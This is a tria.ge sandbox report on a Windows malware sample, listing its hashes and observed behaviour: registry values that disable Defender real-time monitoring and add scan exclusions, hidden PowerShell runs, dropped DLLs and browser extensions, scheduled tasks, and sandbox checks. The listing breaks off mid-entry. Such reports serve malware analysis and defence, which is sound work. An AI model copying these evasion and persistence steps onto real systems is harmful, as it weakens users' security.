Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
225s -
max time network
231s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17/05/2024, 00:13
Static task
static1
Behavioral task
behavioral1
Sample
cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe
Resource
win7-20240221-en
General
-
Target
cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe
-
Size
7.3MB
-
MD5
6ab93856657f98664025489aff89ea78
-
SHA1
6045d673642fd3bb832bf7289022d1b37d11de17
-
SHA256
cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d
-
SHA512
d3a083eebcbe8f271540ca2fa636c15599cf268e82097bc9bb8f2f5d2773461b9505426519baecf40c51390e83ad980ab565710fc821c3aecb71e475add37a1f
-
SSDEEP
196608:91OPAOeH0m2q6X7123fIOt75sZeSi7xIYcmAiME:3OYO98PvtViZUx2O
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RcAuZGsZhuUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kLpsRMujXEpbC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kLpsRMujXEpbC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NGysLhxJEZNwhMVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\mrYrpJCpOmktZWwz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\mrYrpJCpOmktZWwz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BeEwQyQINcRtuKICoSR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\mrYrpJCpOmktZWwz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\REeMUtPoCvFU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tffvHWJZU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NGysLhxJEZNwhMVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RcAuZGsZhuUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tffvHWJZU = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\mrYrpJCpOmktZWwz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BeEwQyQINcRtuKICoSR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\REeMUtPoCvFU2 = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 760 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 2640 powershell.exe 1044 powershell.exe 2484 powershell.exe 1056 powershell.EXE 2924 powershell.EXE 2204 powershell.exe 2880 powershell.EXE 940 powershell.exe 1132 powershell.exe 1592 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\International\Geo\Nation hcLxuQy.exe -
Executes dropped EXE 4 IoCs
pid Process 848 Install.exe 2824 Install.exe 816 PXzTbUr.exe 2728 hcLxuQy.exe -
Loads dropped DLL 12 IoCs
pid Process 2236 cf613c83fd006ca96400f5e5cf2646edd93cc0755782021b52499084480d1f4d.exe 848 Install.exe 848 Install.exe 848 Install.exe 848 Install.exe 2824 Install.exe 2824 Install.exe 2824 Install.exe 760 rundll32.exe 760 rundll32.exe 760 rundll32.exe 760 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json hcLxuQy.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json hcLxuQy.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini PXzTbUr.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 hcLxuQy.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol PXzTbUr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 hcLxuQy.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol PXzTbUr.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA hcLxuQy.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hcLxuQy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA hcLxuQy.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat hcLxuQy.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol hcLxuQy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 hcLxuQy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 hcLxuQy.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA hcLxuQy.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA hcLxuQy.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File created C:\Windows\system32\GroupPolicy\gpt.ini PXzTbUr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA hcLxuQy.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi hcLxuQy.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak hcLxuQy.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja hcLxuQy.exe File created C:\Program Files (x86)\REeMUtPoCvFU2\WoZCFdMmkkIBS.dll hcLxuQy.exe File created C:\Program Files (x86)\kLpsRMujXEpbC\CRSZSVE.xml hcLxuQy.exe File created C:\Program Files (x86)\tffvHWJZU\oCdmkB.dll hcLxuQy.exe File created C:\Program Files (x86)\tffvHWJZU\XlpYdbP.xml hcLxuQy.exe File created C:\Program Files (x86)\kLpsRMujXEpbC\MAqtXbA.dll hcLxuQy.exe File created C:\Program Files (x86)\RcAuZGsZhuUn\FuSaVwM.dll hcLxuQy.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi hcLxuQy.exe File created C:\Program Files (x86)\REeMUtPoCvFU2\fnRiKUr.xml hcLxuQy.exe File created C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\ykSTBMG.dll hcLxuQy.exe File created C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\NXOWJiz.xml hcLxuQy.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\butYHpXTvMdZIJsEKZ.job schtasks.exe File created C:\Windows\Tasks\WFVPvOFzrjCnPPlbL.job schtasks.exe File created C:\Windows\Tasks\oiGBDDjiIQmhwtu.job schtasks.exe File created C:\Windows\Tasks\dSPsRFCNvoTMekFez.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2712 schtasks.exe 2736 schtasks.exe 560 schtasks.exe 976 schtasks.exe 1920 schtasks.exe 2296 schtasks.exe 2012 schtasks.exe 948 schtasks.exe 588 schtasks.exe 2716 schtasks.exe 2344 schtasks.exe 2756 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs hcLxuQy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-38-e2-66-6c-a1\WpadDecisionTime = 40165054efa7da01 rundll32.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0072000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8829A0F-3A71-4B6E-8834-94893B633852}\5a-38-e2-66-6c-a1 hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople hcLxuQy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-38-e2-66-6c-a1\WpadDecision = "0" hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs hcLxuQy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ hcLxuQy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates hcLxuQy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 01000000000000002068af1defa7da01 PXzTbUr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs hcLxuQy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PXzTbUr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" hcLxuQy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\5a-38-e2-66-6c-a1 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs hcLxuQy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings hcLxuQy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 hcLxuQy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8829A0F-3A71-4B6E-8834-94893B633852}\WpadDecisionTime = 40165054efa7da01 hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs hcLxuQy.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs hcLxuQy.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" hcLxuQy.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" PXzTbUr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust hcLxuQy.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates hcLxuQy.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2640 powershell.exe 2640 powershell.exe 2640 powershell.exe 1044 powershell.exe 2484 powershell.exe 2484 powershell.exe 2484 powershell.exe 1056 powershell.EXE 1056 powershell.EXE 1056 powershell.EXE 2880 powershell.EXE 2880 powershell.EXE 2880 powershell.EXE 940 powershell.exe 2924 powershell.EXE 2924 powershell.EXE 2924 powershell.EXE 1132 powershell.exe 1132 powershell.exe 1132 powershell.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 1592 powershell.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2204 powershell.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe 2728 hcLxuQy.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2640 powershell.exe Token: SeDebugPrivilege 1044 powershell.exe Token: SeIncreaseQuotaPrivilege 1956 WMIC.exe Token: SeSecurityPrivilege 1956 WMIC.exe Token: SeTakeOwnershipPrivilege 1956 WMIC.exe Token: SeLoadDriverPrivilege 1956 WMIC.exe Token: SeSystemProfilePrivilege 1956 WMIC.exe Token: SeSystemtimePrivilege 1956 WMIC.exe Token: SeProfSingleProcessPrivilege 1956 WMIC.exe Token: SeIncBasePriorityPrivilege 1956 WMIC.exe Token: SeCreatePagefilePrivilege 1956 WMIC.exe Token: SeBackupPrivilege 1956 WMIC.exe Token: SeRestorePrivilege 1956 WMIC.exe Token: SeShutdownPrivilege 1956 WMIC.exe Token: SeDebugPrivilege 1956 WMIC.exe Token: SeSystemEnvironmentPrivilege 1956 WMIC.exe Token: SeRemoteShutdownPrivilege 1956 WMIC.exe Token: SeUndockPrivilege 1956 WMIC.exe Token: SeManageVolumePrivilege 1956 WMIC.exe Token: 33 1956 WMIC.exe Token: 34 1956 WMIC.exe Token: 35 1956 WMIC.exe Token: SeDebugPrivilege 2484 powershell.exe Token: SeDebugPrivilege 1056 powershell.EXE Token: SeDebugPrivilege 2880 powershell.EXE Token: SeDebugPrivilege 940 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1512 WMIC.exe Token: SeIncreaseQuotaPrivilege 1512 WMIC.exe Token: SeSecurityPrivilege 1512 WMIC.exe Token: SeTakeOwnershipPrivilege 1512 WMIC.exe Token: SeLoadDriverPrivilege 1512 WMIC.exe Token: SeSystemtimePrivilege 1512 WMIC.exe Token: SeBackupPrivilege 1512 WMIC.exe Token: SeRestorePrivilege 1512 WMIC.exe Token: SeShutdownPrivilege 1512 WMIC.exe Token: SeSystemEnvironmentPrivilege 1512 WMIC.exe Token: SeUndockPrivilege 1512 WMIC.exe Token: SeManageVolumePrivilege 1512 WMIC.exe Token: SeDebugPrivilege 2924 powershell.EXE Token: SeDebugPrivilege 1132 powershell.exe Token: SeDebugPrivilege 1592 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1588 WMIC.exe Token: SeIncreaseQuotaPrivilege 1588 WMIC.exe Token: SeSecurityPrivilege 1588 WMIC.exe Token: SeTakeOwnershipPrivilege 1588 WMIC.exe Token: SeLoadDriverPrivilege 1588 WMIC.exe Token: SeSystemtimePrivilege 1588 WMIC.exe Token: SeBackupPrivilege 1588 WMIC.exe Token: SeRestorePrivilege 1588 WMIC.exe Token: SeShutdownPrivilege 1588 WMIC.exe Token: SeSystemEnvironmentPrivilege 1588 WMIC.exe Token: SeUndockPrivilege 1588 WMIC.exe Token: SeManageVolumePrivilege 1588 WMIC.exe Token: SeDebugPrivilege 2204 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1628 